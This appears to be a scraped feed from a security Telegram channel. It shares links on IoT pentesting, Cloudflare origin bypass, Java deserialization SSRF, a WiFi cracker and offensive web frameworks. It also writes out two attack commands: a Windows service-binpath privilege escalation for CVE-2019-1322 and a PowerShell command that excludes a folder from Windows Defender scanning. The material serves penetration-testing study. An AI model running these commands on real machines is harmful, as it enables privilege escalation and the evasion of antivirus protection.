IoT Pentesting 101 && IoT security 101
https://github.com/V33RU/IoTSecurity101
#iot
#pentest
#security
@sec_nerd_en
https://github.com/V33RU/IoTSecurity101
#iot
#pentest
#security
@sec_nerd_en
GitHub
GitHub - V33RU/awesome-connected-things-sec: A Curated list of Security Resources for all connected things
A Curated list of Security Resources for all connected things - V33RU/awesome-connected-things-sec
cloudflare bypass material
https://blog.christophetd.fr/bypassing-cloudflare-using-internet-wide-scan-data/
http://www.chokepoint.net/2017/10/exposing-server-ips-behind-cloudflare.html
http://www.securityidiots.com/Web-Pentest/Information-Gathering/Cloudflare-Bypass/Part-2-Cloudflare-Security-Bypass.html
https://medium.com/secure-hacker/bypass-cloudflare-protection-get-subdomains-ofa-website-2cb1d749c510
#web
#pentest
#bypass
#sqli
#xss
@sec_nerd_en
https://blog.christophetd.fr/bypassing-cloudflare-using-internet-wide-scan-data/
http://www.chokepoint.net/2017/10/exposing-server-ips-behind-cloudflare.html
http://www.securityidiots.com/Web-Pentest/Information-Gathering/Cloudflare-Bypass/Part-2-Cloudflare-Security-Bypass.html
https://medium.com/secure-hacker/bypass-cloudflare-protection-get-subdomains-ofa-website-2cb1d749c510
#web
#pentest
#bypass
#sqli
#xss
@sec_nerd_en
Christophe Tafani-Dereeper
CloudFlair: Bypassing Cloudflare using Internet-wide scan data - Christophe Tafani-Dereeper
Cloudflare is a service that acts as a middleman between a website and its end users, protecting it from various attacks. Unfortunately, those websites are often poorly configured, allowing an attacker to entirely bypass Cloudflare and run DDoS attacks or…
#Java Deserialization: Misusing OJDBC for SSRF
https://agrrrdog.blogspot.com/2018/01/java-deserialization-misusing-ojdbc-for.html
#pentest
https://agrrrdog.blogspot.com/2018/01/java-deserialization-misusing-ojdbc-for.html
#pentest
Blogspot
Java Deserialization: Misusing OJDBC for SSRF
This year ZeroNights has got a new zone - Web Village. It was a special "track" for people who were interested in web security. The basic...
TIDoS Framework
The Offensive Web Application Penetration Testing Framework.
https://github.com/theInfectedDrake/TIDoS-Framework
#web
#pentest
The Offensive Web Application Penetration Testing Framework.
https://github.com/theInfectedDrake/TIDoS-Framework
#web
#pentest
DbgShell - A PowerShell Front-End For The Windows Debugger Engine http://bit.ly/2O7c30o #infosec #hacking #hackers #pentesting #pentest #programming #opensource #powershell #Windows
Forwarded from امنیت اطلاعات
Gerix WiFi Cracker 2018
https://github.com/kimocoder/gerix-wifi-cracker
#wifi
#network
#pentest
@sec_nerd
https://github.com/kimocoder/gerix-wifi-cracker
#wifi
#network
#pentest
@sec_nerd
Forwarded from امنیت اطلاعات
Forwarded from امنیت اطلاعات
CVE-2019-1322
as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
https://twitter.com/decoder_it/status/1193496591140818944?s=20
تست نشده!
#windows
#privesc
#pentest
@sec_nerd
as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
https://twitter.com/decoder_it/status/1193496591140818944?s=20
تست نشده!
#windows
#privesc
#pentest
@sec_nerd
Twitter
ap
CVE-2019-1322 as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
Add a file/folder to #Windows Defender exclusion list
C:\>powershell -exec bypass - "Add-MpPreference -ExclusionPath 'D:\EvilFolder\Tools'"
useful if you want to move #pentest tools to a Windows machine without Defender interfering
Admin UAC prompt required
#powershell #oscp
C:\>powershell -exec bypass - "Add-MpPreference -ExclusionPath 'D:\EvilFolder\Tools'"
useful if you want to move #pentest tools to a Windows machine without Defender interfering
Admin UAC prompt required
#powershell #oscp